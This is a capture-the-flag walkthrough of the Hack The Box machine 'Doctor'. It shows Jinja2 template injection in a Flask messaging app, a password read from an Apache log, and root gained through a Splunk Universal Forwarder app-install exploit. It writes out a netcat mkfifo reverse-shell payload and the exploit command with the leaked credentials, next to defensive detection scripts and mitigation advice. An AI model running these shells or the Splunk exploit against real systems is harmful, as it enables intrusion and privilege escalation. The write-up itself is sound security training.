
Doctor is a Linux machine from Hack The Box rated as easy. The path consists of finding a virtual host that serves a messaging application vulnerable to server-side template injection (SSTI); after obtaining a foothold through it, a password leaked into an Apache log file allows pivoting to a second user, and from there a root shell is obtained by abusing the Splunk Universal Forwarder.
Enumeration
Running nmap:

```
nmap -sC -sV doctor.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-27 17:01 CEST
Nmap scan report for doctor.htb (10.129.18.114)
Host is up (0.047s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open  ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after:  2023-09-06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Browsing to port 80 we find the following page:
Scrolling down a bit we can see an email address, info@doctors.htb. The domain differs from doctor.htb, so I added doctors.htb to my hosts file in case the web server serves it as a separate virtual host.
Browsing to doctors.htb we are greeted with a login form, but there is an option to register new users:
So we can create an account and log in:
Once logged in we can create messages:
Now we can use gobuster to discover hidden directories:
```
gobuster dir -u http://doctors.htb/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/register (Status: 200)
/account (Status: 302)
/archive (Status: 200)
/login (Status: 200)
/home (Status: 302)
/logout (Status: 302)
```
Browsing to /archive the page looks empty, but the source is an RSS feed that contains the title of the message we created:
```xml
<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title>Archive</title>
<item><title>Test</title></item>
</channel>
```
Checking Wappalyzer we see the site is built with Flask on Python 3, so the templating engine is almost certainly Jinja2:
Taking this into account, we can test the site for SSTI (server-side template injection). The check is to submit a mathematical expression wrapped in template syntax, for example a message titled {{7*2}}, and see whether it comes back evaluated: that only happens when the application builds the template text from user input instead of passing the value to the template as a variable.
Going to /archive we see the result of the operation (14) where our expression should have been echoed back, so the site is vulnerable to SSTI:
```xml
<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title>Archive</title>
<item><title>Test</title></item>
</channel>
<item><title>14</title></item>
</channel>
```
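The probe described above, written up as an added example (it is not code from the original writeup): it builds an arithmetic probe from two random factors, so the expected product is unlikely to appear in the page by accident the way 49 from the classic {{7*7}} might, and then checks the /archive feed for the evaluated value. Both feed samples are constructed here from the shape of the feed seen on the box; the feed is deliberately parsed with a regex because the real response is not well-formed XML. Sending the probe as a message title over HTTP is left to the caller.

```python
import random
import re

# Constructed sample: what /archive returned when the message title was the
# probe, in the vulnerable case (expression evaluated, as seen on the box)
# and in a safe case (expression reflected literally).
VULNERABLE_ARCHIVE = """<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title>Archive</title>
<item><title>Test</title></item>
</channel>
<item><title>14</title></item>
</channel>"""

SAFE_ARCHIVE = """<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title>Archive</title>
<item><title>Test</title></item>
<item><title>{{7*2}}</title></item>
</channel>"""


def make_probe(seed=None):
    """Return (payload, expected) for a Jinja2-style arithmetic probe.

    Two three-digit factors give a product that will not collide with
    content already on the page; pass a seed only for reproducibility.
    """
    rng = random.Random(seed)
    a = rng.randint(100, 999)
    b = rng.randint(100, 999)
    return "{{%d*%d}}" % (a, b), str(a * b)


def item_titles(rss_text):
    """Extract <item><title>...</title></item> values.

    A regex is used instead of an XML parser on purpose: the feed on the box
    has a stray </channel> and a strict parser would reject exactly the
    response we need to inspect.
    """
    return re.findall(r"<item><title>(.*?)</title></item>", rss_text, re.S)


def is_ssti(archive_text, payload, expected):
    """True when the probe came back evaluated rather than echoed verbatim."""
    titles = item_titles(archive_text)
    if payload in titles:
        return False           # reflected as-is: template syntax not evaluated
    return expected in titles  # the product appears where our payload was


if __name__ == "__main__":
    payload, expected = "{{7*2}}", "14"  # the values observed on the box
    print("vulnerable feed:", is_ssti(VULNERABLE_ARCHIVE, payload, expected))
    print("safe feed:", is_ssti(SAFE_ARCHIVE, payload, expected))
    print("fresh probe:", *make_probe())
```

A hit only means the engine evaluated arithmetic; which engine it is (and therefore which RCE payload applies) still has to be confirmed, for instance with {{7*'7'}} to tell Jinja2 from Twig.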
Exploitation
Now we can get a Python reverse shell by using one of the Jinja2 SSTI payloads from PayloadsAllTheThings as the message title, with a netcat listener waiting on port 443.
After posting the message we trigger it by browsing to /archive; on the netcat listener we get a reverse shell as the user web:
```
nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.161] from (UNKNOWN) [10.129.18.114] 49186
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(web) gid=1001(web) groups=1001(web),4(adm)
$ whoami
web
```
Now we need to pivot to the other user on the box, shaun. Note that web is a member of the adm group, which is what grants read access to the logs under /var/log:
```
web@doctor:/home$ ls
shaun web
```
Inside the Apache log directory there is a file named backup that does not follow the rotated-log naming scheme, which caught my attention:
```
web@doctor:/var/log/apache2$ ls
access.log        access.log.6.gz  error.log.11.gz  error.log.6.gz
access.log.1      access.log.7.gz  error.log.12.gz  error.log.7.gz
access.log.10.gz  access.log.8.gz  error.log.13.gz  error.log.8.gz
access.log.11.gz  access.log.9.gz  error.log.14.gz  error.log.9.gz
access.log.2.gz   backup           error.log.2.gz   other_vhosts_access.log
access.log.3.gz   error.log        error.log.3.gz
access.log.4.gz   error.log.1      error.log.4.gz
access.log.5.gz   error.log.10.gz  error.log.5.gz
```
Grepping it for "password" returns a request to the password-reset endpoint in which someone submitted what looks like a password in the email field. Because the value travelled in the query string, it was recorded in the access log; it turns out to be shaun's password:
```
web@doctor:/var/log/apache2$ cat backup | grep password
10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
web@doctor:/var/log/apache2$ su shaun
Password:
shaun@doctor:/var/log/apache2$ id
uid=1002(shaun) gid=1002(shaun) groups=1002(shaun)
```
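The same idea done systematically, as an added example that is not part of the original writeup: a small scanner over Apache access-log lines that flags query-string parameters likely to hold secrets. Only the first sample line is the one found in backup; the other lines are constructed, and the list of sensitive parameter names is an assumption to tune per application.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample. Line 1 is the entry found in /var/log/apache2/backup on
# the box (kept verbatim, odd timezone included); lines 2-4 are made up here.
SAMPLE_LOG = """\
10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
10.10.14.4 - - [05/Sep/2020:11:18:02 +2000] "POST /reset_password?email=shaun@doctor.htb" 200 1200 "http://doctor.htb/reset_password"
10.10.14.4 - - [05/Sep/2020:11:20:11 +2000] "GET /login?next=/home HTTP/1.1" 200 3040 "-"
10.10.14.4 - - [05/Sep/2020:11:21:45 +2000] "GET /api/items?token=deadbeefcafe HTTP/1.1" 200 88 "-"
"""

# Parameter names whose values should never be in a URL, and so never in a
# log, proxy cache or Referer header (assumed list, extend per application).
SENSITIVE_KEYS = {"password", "passwd", "pwd", "pass", "token",
                  "secret", "api_key", "apikey", "access_token"}

# The quoted request: method, target, and an optional protocol version.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?"')


def parse_request(line):
    """Return (method, path, {param: value}) for one log line, or None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    return m.group("method"), parts.path, params


def find_leaks(log_text):
    """Return (line_no, reason, key, value) for every suspicious parameter."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        parsed = parse_request(line)
        if parsed is None:
            continue
        method, path, params = parsed
        for key, value in params.items():
            lk = key.lower()
            reasons = []
            if lk in SENSITIVE_KEYS:
                reasons.append("sensitive parameter name in URL")
            if method == "POST":
                # Form fields belong in the request body. A POST carrying
                # query parameters means user input ended up in the URL.
                reasons.append("form field submitted in query string of POST")
            if lk == "email" and "@" not in value:
                # Exactly the mistake on the box: a password typed into the
                # email field of the reset form.
                reasons.append("email field holds a non-email value")
            for reason in reasons:
                findings.append((n, reason, key, value))
    return findings


if __name__ == "__main__":
    for line_no, reason, key, value in find_leaks(SAMPLE_LOG):
        print(f"line {line_no}: {reason}: {key}={value}")
```

Run against a real log it should be piped through `zcat`/`cat` on the rotated files as well, since the password here was sitting in an off-rotation copy. On the defensive side the fix is to keep credentials out of URLs entirely (POST bodies, not query strings) and to restrict who can read the log directory, which on this box was open to the adm group.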
Privilege Escalation
Going back to the nmap scan, port 8089 was open and served Splunkd, the Splunk management interface.
Inside /opt there is a directory named splunkforwarder, so the host runs a Splunk Universal Forwarder:
```
shaun@doctor:/opt$ ls
clean splunkforwarder
```
Searching for a Splunk forwarder privilege escalation I came across the following exploit.
The GitHub repository contains two versions, a local and a remote one. Since the exploit was written for Python 2 and the machine only had Python 3, I went with the remote exploit, run from my own machine against port 8089.
The exploit abuses the Splunk Universal Forwarder's management API: after authenticating, it instructs the forwarder to fetch and install an app from a URL on our machine (in effect, using our machine as its deployment server). Once the connection is made, our machine serves an app bundle containing the malicious code, and splunkd runs it when the app is installed. Because splunkd runs as root on this box, whatever the app executes runs as root. Note that this needs valid Splunk credentials and a reachable management port; it is a credential reuse and privilege issue rather than a vulnerability in the forwarder itself.
To run the exploit remotely we use shaun's credentials, which are reused for Splunk, instead of the default ones, and we specify a netcat reverse shell as the payload.
Running the exploit:

```
python splunk.py --host doctor.htb --port 8089 --lhost 10.10.14.161 --username shaun --password Guitar123 \
  --payload 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.161 4444 >/tmp/f'
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmpPYWA_O.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.14.161:8181/
10.129.18.114 - - [27/Sep/2020 22:36:35] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!
Press RETURN to cleanup
```
Back on the netcat listener we now have a root shell:
```
nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.161] from (UNKNOWN) [10.129.18.114] 38832
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# hostname
doctor
```
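For the defensive or forensic side of the privilege escalation, here is an added example (not code from the original writeup or from the exploit's repository) that audits a Splunk app bundle for the mechanism such exploits rely on: a scripted input declared in inputs.conf, which splunkd executes on the configured interval. The bundle is constructed in memory to exercise the audit; its app name, script path and stanza values are assumptions, and the script body is a placeholder rather than any payload.

```python
import configparser
import io
import tarfile


def build_sample_bundle():
    """Construct, in memory, an app bundle shaped like one a forwarder would
    download and install: a script under bin/ and an inputs.conf that tells
    splunkd to run it. Constructed sample for the audit below; the script
    body is a placeholder, not a payload."""
    files = {
        "evilapp/bin/run.sh": "#!/bin/sh\n# placeholder\n",
        "evilapp/default/inputs.conf": (
            "[script://$SPLUNK_HOME/etc/apps/evilapp/bin/run.sh]\n"
            "disabled = 0\n"
            "interval = 10\n"
            "sourcetype = evilapp\n"
        ),
        "evilapp/default/app.conf": "[install]\nstate = enabled\n",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, content in files.items():
            data = content.encode()
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def scripted_inputs(bundle_bytes):
    """Return [(app, script_target, enabled)] for every [script://...] stanza
    in any inputs.conf inside the bundle.

    Works from bytes so it can be pointed at a tarball captured from the
    wire (the forwarder fetched it over plain HTTP here) or at one left on
    disk, for example under /tmp as the exploit output shows."""
    results = []
    with tarfile.open(fileobj=io.BytesIO(bundle_bytes), mode="r") as tar:
        for member in tar.getmembers():
            if not member.isfile() or not member.name.endswith("inputs.conf"):
                continue
            app = member.name.split("/", 1)[0]
            text = tar.extractfile(member).read().decode("utf-8", "replace")
            # interpolation=None: Splunk conf values contain '$' and '%'.
            cp = configparser.ConfigParser(interpolation=None, strict=False)
            cp.read_string(text)
            for section in cp.sections():
                if section.startswith("script://"):
                    disabled = cp.get(section, "disabled", fallback="0").strip().lower()
                    enabled = disabled not in ("1", "true")
                    results.append((app, section[len("script://"):], enabled))
    return results


if __name__ == "__main__":
    for app, target, enabled in scripted_inputs(build_sample_bundle()):
        state = "ENABLED" if enabled else "disabled"
        print(f"{app}: scripted input {target} ({state})")
```

Any enabled scripted input in an app that nobody deployed on purpose is the indicator to look for after an incident like this one. Structurally, the root shell exists because splunkd runs as root and accepts a reused user password over a management port exposed to the network; running the forwarder as an unprivileged account, giving it its own credentials, and keeping port 8089 off untrusted networks each independently breaks the chain.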